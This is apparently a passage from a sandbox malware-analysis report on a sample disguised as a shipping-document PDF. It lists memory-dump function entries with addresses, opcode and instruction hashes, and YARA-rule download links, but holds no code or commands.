Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e53bec2b22548f1e1ac22a3a4b4b8f040edd78447df131e89b2d66003b5db5
Instruction ID: f71616eac5d97689d124ff55116964f983b2767ddbc07b409068f8d47d2780c8
Opcode Fuzzy Hash: 80e53bec2b22548f1e1ac22a3a4b4b8f040edd78447df131e89b2d66003b5db5
Instruction Fuzzy Hash: 9E216031610705CFDB65FB38C440AAAB7E6EF85315F0088ADD05A5B264DF31BC8ACB41

Function 00A7D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085741447.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction ID: 3f6aa2673b9949de91703c3ceccc62efa6859528ab450ec793ce18e172c4c314
Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction Fuzzy Hash: 17219D76504240DFDB06CF50D9C4B56BF72FF88314F24C5A9DD490A656C33AD82ACBA2

Function 06B68280 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e2f0eb1d5d3bcba7ede4719d16670ed9c3bca14c49d9e3d85ade706758c875
Instruction ID: ae873fc78c889d7ce986a263866bab33310234e0594a87de7589a4f8fac967fd
Opcode Fuzzy Hash: d1e2f0eb1d5d3bcba7ede4719d16670ed9c3bca14c49d9e3d85ade706758c875
Instruction Fuzzy Hash: D51106B1B40900DFE3748B2A8C45B7977A3FF84B10F5180AAF1039F2A5CA78C802CB61

Function 06B6C2DA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd2361e6ec1606f36f6bbf1d21149ce2cf50e1148da3f31dda99379e8d93dca7
Instruction ID: 2dcc6fd9bad0cb9f16a1e4a6672e639005d1f3b050dff2fbfedfbeceb2568394
Opcode Fuzzy Hash: fd2361e6ec1606f36f6bbf1d21149ce2cf50e1148da3f31dda99379e8d93dca7
Instruction Fuzzy Hash: 1521B7B4D05229CFDBA4DF6AC980B9CB7B5BB49204F1481DAE519F3351D7345A80CF11

Function 06B6024A Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e67590edbc30ace6062cb73e3f18ef782572ee146b52e93ded96f49947034ae
Instruction ID: c0c23eae4066dc0eed12b6297437b40a832354bca9c3b70ce2eb8391e5cee75c
Opcode Fuzzy Hash: 7e67590edbc30ace6062cb73e3f18ef782572ee146b52e93ded96f49947034ae
Instruction Fuzzy Hash: 02114E30A453414FD3A6EA2BD984B6F7B5BEFC0310F08846AE546871A5CF38D846C751

Function 06B68290 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b567769b8980c3207a3c7fe326dd507c83b140812501109b320ec165a7c298
Instruction ID: a5619dfe98fa108754804bc18dd45d7c46f8034dfb1efe29c436c895365ee541
Opcode Fuzzy Hash: 63b567769b8980c3207a3c7fe326dd507c83b140812501109b320ec165a7c298
Instruction Fuzzy Hash: F501F9B1B80D00DFE3644A2A8C05B397397EFC4B00F5184AAF6039F2E5C9B8D801CBA1

Function 00A8D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085804747.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: a085e0524a9db75c31017494e2351829cd405d7e45fb77b1abdbb67be62ec67f
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 2211BB75504280DFCB02DF14C5C4B15BBA1FB84314F24C6A9D8494B296C33AD81ACB62

Function 06B6CBE0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18deb7e66da8841b4ba94225ace5e5d43cd4015f3197962949f654525e549abd
Instruction ID: 2145806b3a09dd8d11bb96eac16f1c1001bcd53f290aa7d2516b446715e3c35c
Opcode Fuzzy Hash: 18deb7e66da8841b4ba94225ace5e5d43cd4015f3197962949f654525e549abd
Instruction Fuzzy Hash: 851121B4D09108DFD744CF5AC5806ADFBB9FB89300F14D1E5E44A97202D734AA54CBC0

Function 04F98D18 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66cba1408d3b66b17e180e5a9c58ed455f9d0719b0c04ee61b6ebf5f13326dcc
Instruction ID: 5068e41861755a0fd98ea32836639d9613a9076fca453715342dad6e68afc392
Opcode Fuzzy Hash: 66cba1408d3b66b17e180e5a9c58ed455f9d0719b0c04ee61b6ebf5f13326dcc
Instruction Fuzzy Hash: 2D117031A00205DBDB14FFA5D4146DEBBF2EF89304F508869D505A7294DB76AD06CFE2

Function 06B6CA08 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01684ebf3bef1aabc88129d8e8d9cb505b00c4814dfb68f90f934f23fa000ab
Instruction ID: 09436283ab386c787997ebaaa56980248de6cb0c79a0e34f6e35ce69a9a540d9
Opcode Fuzzy Hash: c01684ebf3bef1aabc88129d8e8d9cb505b00c4814dfb68f90f934f23fa000ab
Instruction Fuzzy Hash: 46016D74A09104DFC744DFA9C558AA9BFF9EB49300F15C0D4E5489B326D7349E00DB81

Function 04F9F3DA Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efeb34b4980a5cdf157c58628d74cf262cac893ef844cea9129593ca3687ae74
Instruction ID: 6569b69ea20f5eb8275f2537dacbb8fcb224424819e9217c8c5900fabd8e5c38
Opcode Fuzzy Hash: efeb34b4980a5cdf157c58628d74cf262cac893ef844cea9129593ca3687ae74
Instruction Fuzzy Hash: 9F0152317042508FD715DB69D888E6BBBEAEFC9315B24886DE41AC7361CB71EC46CB60

Function 06B625F7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fbbf2896ef65fe99463df3554b3d78fc553d85212ccbc775ad3b65856ded7cf
Instruction ID: da6c1a4c009c2793b3e590c8e6301ea846534d5a50a0ddf643ecf87195fe7fd0
Opcode Fuzzy Hash: 7fbbf2896ef65fe99463df3554b3d78fc553d85212ccbc775ad3b65856ded7cf
Instruction Fuzzy Hash: 7911C270E0024A8FEB45EF68C8416AEBBB1EF89340F048569D405FB392DB789545CB80

Function 06B681A7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcb0799cec9cc7d7ecf357313571c663f399129461245de825db587309d1d362
Instruction ID: 19827c3525ee0b6e86281fc524dc6ffa58bc57899cf34d27f9878343a94c37e9
Opcode Fuzzy Hash: dcb0799cec9cc7d7ecf357313571c663f399129461245de825db587309d1d362
Instruction Fuzzy Hash: D40180B2A14429CFE7844FAEDD80779B2B1FF88705F0041A6F626A6181D338D950C7A1

Function 06B654B9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4528f8b67bec7c4c5ca1fb2b2a592d9b474d3de9f1feafd4379150451dc8e4
Instruction ID: 948b4639ad5baea57a9daff8f3b9a46f6ce6c802251277b9307773317324e823
Opcode Fuzzy Hash: 8f4528f8b67bec7c4c5ca1fb2b2a592d9b474d3de9f1feafd4379150451dc8e4
Instruction Fuzzy Hash: BE0126B36080358FD7708A2A9C4076A77A9FB04221F1545A3F51AD7281C679D9B183D1

Function 06B6C999 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5be4d7bb2e08455e8f678d19cdff1e88d676e56edadbd88d815d050fa0fe4579
Instruction ID: 467704288ca0cedae1cf3c26608d713b82283a8ed33cbe250ee07def50156697
Opcode Fuzzy Hash: 5be4d7bb2e08455e8f678d19cdff1e88d676e56edadbd88d815d050fa0fe4579
Instruction Fuzzy Hash: C901A2B5909244DFD756CF56C400AE9BFBCAF4A30CB00A1E5E4899B253D7389A05DBD0

Function 04F91E15 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f409d6c0d7aa8f79b677ba237a0a2596081fb2222bc4bfec42548e40ae9ec5
Instruction ID: 8d1f37809389e7b4a0b567dfe2c5770e2812264d9db35ef345184cd94f9600eb
Opcode Fuzzy Hash: 37f409d6c0d7aa8f79b677ba237a0a2596081fb2222bc4bfec42548e40ae9ec5
Instruction Fuzzy Hash: 04112170D0020ADFEB25DF69C5847EDBFF1AF89320F24C169E5245B250C7715986CB54

Function 00A7D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085741447.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d297762b5a9dbad9b7ceea6fd78fb944b1a31dfdce0f370027dd383f75c20dd
Instruction ID: 4d031db61333a2f00b8aa6f1c028f41f9c56bc05c7b8deab299d12c1405ca13c
Opcode Fuzzy Hash: 3d297762b5a9dbad9b7ceea6fd78fb944b1a31dfdce0f370027dd383f75c20dd
Instruction Fuzzy Hash: 8601D6711043449EE7249F29CD84B67BFBCEF86324F18C52AED5D0E286D6799C41CAB1

Function 04F9F3E8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34feb314abd48a747b6a04ac69fed78a3b72996b5d80224807726eeba88f386b
Instruction ID: 2a307fe280d4fe957b86da3847c22b17269e6087834d35c4df855ce8f095910a
Opcode Fuzzy Hash: 34feb314abd48a747b6a04ac69fed78a3b72996b5d80224807726eeba88f386b
Instruction Fuzzy Hash: F00121757042108FD718DB69D88896AB7EAFFC9314724886DE51AC7361CF71EC46CB60

Function 04F98D08 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26157c504a0f86fccb66be5992de55c9945cfdccc8f8304e73d3b1340f3b251c
Instruction ID: 5891fd017567ef97e2f2a12633924fb705d71ad805e209df30335535cda84d4b
Opcode Fuzzy Hash: 26157c504a0f86fccb66be5992de55c9945cfdccc8f8304e73d3b1340f3b251c
Instruction Fuzzy Hash: 3801D230A00201DBEB14FF65C8187AEBFF2EF85304F54882DD446AB295DB75AD06CB92

Function 04F90AF0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9190cc00996c4a98d143af0d78c8fcbe8173bf74c9b3348cfbb39e0bb03170
Instruction ID: 53ce8847510cb2724e56a8e0cd3c9e500179fb9cbb889be119ff1bb26892f0ef
Opcode Fuzzy Hash: 1a9190cc00996c4a98d143af0d78c8fcbe8173bf74c9b3348cfbb39e0bb03170
Instruction Fuzzy Hash: 591196747447808FE715AB74D4683AA7FD2AF86704F044C9ED09A8B3D2CF785849CB62

Function 06B6E28B Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82380b7391af7931d37719c4f8f1f516b16d2468fa874fd02a1847281cc8a52c
Instruction ID: 7035c9ec81035d8307c464c93657b3a4a3809accbb18fdab5d2e839b7197bc9c
Opcode Fuzzy Hash: 82380b7391af7931d37719c4f8f1f516b16d2468fa874fd02a1847281cc8a52c
Instruction Fuzzy Hash: 92115AB8D09209CFD740DF98D448A6DBBF6FB45311B008269F419AB795D738D802CF80

Function 06B6D938 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4ae42bd135ce9f17a5d02a8807ed485405fae9d90b4ce09d13ded585f83d25
Instruction ID: c749485631315dec1866b9b7948efd9863d74ec6dd7cdfb59cac2d6c9e245407
Opcode Fuzzy Hash: fc4ae42bd135ce9f17a5d02a8807ed485405fae9d90b4ce09d13ded585f83d25
Instruction Fuzzy Hash: A1110CB8D052599FCB51DFA8C4506EEFFF5BF09301F148196E954E7341D2349A40CBA1

Function 04F9B200 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85560f9706a47bac65b4388d9796a055d5fe6b61bc2f330b16f05b5b4d735cfd
Instruction ID: e9d89e8c1573f02fe3417c5872c205d6210b57de56ba0d73d58050e05dea9170
Opcode Fuzzy Hash: 85560f9706a47bac65b4388d9796a055d5fe6b61bc2f330b16f05b5b4d735cfd
Instruction Fuzzy Hash: 89015B316007088FEB29EF79C45089A77F6EF85301B54C52ED4465B260EB71F942CB40

Function 06B63600 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c9d8add391bdf4180a120c789a5baf89dcef646033439983726e76a842fd12
Instruction ID: 87ef78adce9611015f07fb8a31e27767b8d88b1fd28a0747b1c522220a61804e
Opcode Fuzzy Hash: 97c9d8add391bdf4180a120c789a5baf89dcef646033439983726e76a842fd12
Instruction Fuzzy Hash: 2001DEB2D1420A9FDF50DF99D9459EFB7F4EB44320F105126F918B7240D734AA14CBA1

Function 06B62608 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fee3ddc3bdc0eaafb2d352bbb725578244976827abff343a229ff946e1071dd
Instruction ID: 3888c917b70c4d8d11401ca3eb7a14c6d08dbd0a5ba2c8b8c342b9ad85395082
Opcode Fuzzy Hash: 6fee3ddc3bdc0eaafb2d352bbb725578244976827abff343a229ff946e1071dd
Instruction Fuzzy Hash: FC018C70E002098FEB44EFA8C8017AEBBB0EF48340F048569D815F7390DB789645CBD0

Function 04F9B1F0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c23ed771fbd52cd62bfe57ebc8b01db0457aa532d3f2cfa41602d2a33e1d3d
Instruction ID: 5451bd2bd8e0ddc0cdeb1973beff730a32639304da5e0d0b97698700cc6d633b
Opcode Fuzzy Hash: e2c23ed771fbd52cd62bfe57ebc8b01db0457aa532d3f2cfa41602d2a33e1d3d
Instruction Fuzzy Hash: 93019E316007048FEB29EF78C854A5A77F5FF85301F54856ED8469B260EB75F982CB40

Function 06B635F2 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769ca8ca530f99b968df1e5cf57673df0b6c31b2a18bce59196cbedbdc11e5f0
Instruction ID: 119436a8828f54795fec7eaa408c04930b0b1552a9acda33d2d28b5672764b95
Opcode Fuzzy Hash: 769ca8ca530f99b968df1e5cf57673df0b6c31b2a18bce59196cbedbdc11e5f0
Instruction Fuzzy Hash: A2014FB2D0420A9FCF51CFA9D8459FEBBB4EF49310F104166E958F7242D7345A15CBA1

Function 06B6BC2E Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8ad554d23646e12cf500cd2252591e91602c9ffcdddd8e7ca1930c4c8c4446
Instruction ID: 33b995ccf96634e82d10eb0fba373fcc8cb065fde7bc76c934d44e9ccaba7cad
Opcode Fuzzy Hash: 2a8ad554d23646e12cf500cd2252591e91602c9ffcdddd8e7ca1930c4c8c4446
Instruction Fuzzy Hash: 500129B8908219CFDB60CF65D884BADBBB6FB4A301F1090D5E50AA7211CB349E94CF91

Function 04F9B570 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f982fab264da9b739652ea57c03131d719cffb0a9798fbe460a57faf644c9b0d
Instruction ID: 771de45d1b3458eafb0c530532ce7656c43069e18614be0ad60d348310cc3ca3
Opcode Fuzzy Hash: f982fab264da9b739652ea57c03131d719cffb0a9798fbe460a57faf644c9b0d
Instruction Fuzzy Hash: 1A016D31A007049BEB12AA649811AEEB7A5AFC1315F05466ED94967350DB31BA42C692

Function 04F998D8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2ad225bc16612c4d29cad8534e0403ab8bdf27ed6decb66b77353dcf614849
Instruction ID: 9100a98755961e506755cd42ec00b7da6463e7f253107c67ce461841a322de90
Opcode Fuzzy Hash: 1b2ad225bc16612c4d29cad8534e0403ab8bdf27ed6decb66b77353dcf614849
Instruction Fuzzy Hash: D6F0963171121097FF297A399814B7D76D6DBC5B19F05406DE509CB360CE65EE03C245

Function 04F99970 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f804d83fc4ba287329b50a701092a7733ef009130f8144cbabdf867d0fcad3d
Instruction ID: acc4901dc06d93559ce4a928c5ea222d4605060801bf5ae489efe85c9f33ae1f
Opcode Fuzzy Hash: 6f804d83fc4ba287329b50a701092a7733ef009130f8144cbabdf867d0fcad3d
Instruction Fuzzy Hash: B4F090363042108BFF245916DC40F7E77E99F81755B0A056EA50AC77A0EAA4ED038691

Function 06B6C00B Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5060b69b67c6248e91745d6fd09a013a74cf8331413655f8930f9918ec08bd
Instruction ID: 4a02880f9de4552b2704f09551e639ea4ea1a4b7cd7ab076fef82b8c32645669
Opcode Fuzzy Hash: fd5060b69b67c6248e91745d6fd09a013a74cf8331413655f8930f9918ec08bd
Instruction Fuzzy Hash: B02154B4901229CFDB64CF69C980B98BBB1BB49201F0081E5E909A7350D7359E81DF10

Function 06B6BE11 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138cc1343f74aa7fe2316dcd3575c17d5c2c2ab75e5e768d352e5e20f841fae0
Instruction ID: f9ef45cf7e094d8b0c0602df802debae8e96cdad96e5bb045ba8c581c2d75986
Opcode Fuzzy Hash: 138cc1343f74aa7fe2316dcd3575c17d5c2c2ab75e5e768d352e5e20f841fae0
Instruction Fuzzy Hash: 8511C5B4905218CFDBA0CFA9C880B9CBBB1FF49305F24419AD519E7341DB34A950CF51

Function 06B6CA18 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2e3b5e1c2fcb3c35b812fe1f4c36fe30a3a6b7f9e2a646020e3f0adb587085
Instruction ID: ac31fe2cfaed15fd01df58113c43c6ab2012d9e914fad5ce7658f1cfdb367755
Opcode Fuzzy Hash: 4a2e3b5e1c2fcb3c35b812fe1f4c36fe30a3a6b7f9e2a646020e3f0adb587085
Instruction Fuzzy Hash: 220116B9A05108DFD744DFA9C684AA8BFF5AB49300F15D0D4A94C9B316D735DE00EB80

Function 04F920C4 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beaa69dc4e427c6beb8c9ccbb9601eee9cdb11131ed4af999c05382b14762e18
Instruction ID: 4d35f1c32fbe1eabde18ef0a63bf6af033e8a30f709a75ed9c39095c43d7492d
Opcode Fuzzy Hash: beaa69dc4e427c6beb8c9ccbb9601eee9cdb11131ed4af999c05382b14762e18
Instruction Fuzzy Hash: 62012970800218EFEF24CFA9C8452ED7FF1AF05310F11C6A5D414AA1A0D7744A86CF90

Function 04F99278 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b603a6b504a3c5b54a161b545c99f0ac09696ad5532f52278e7dfb6698e651
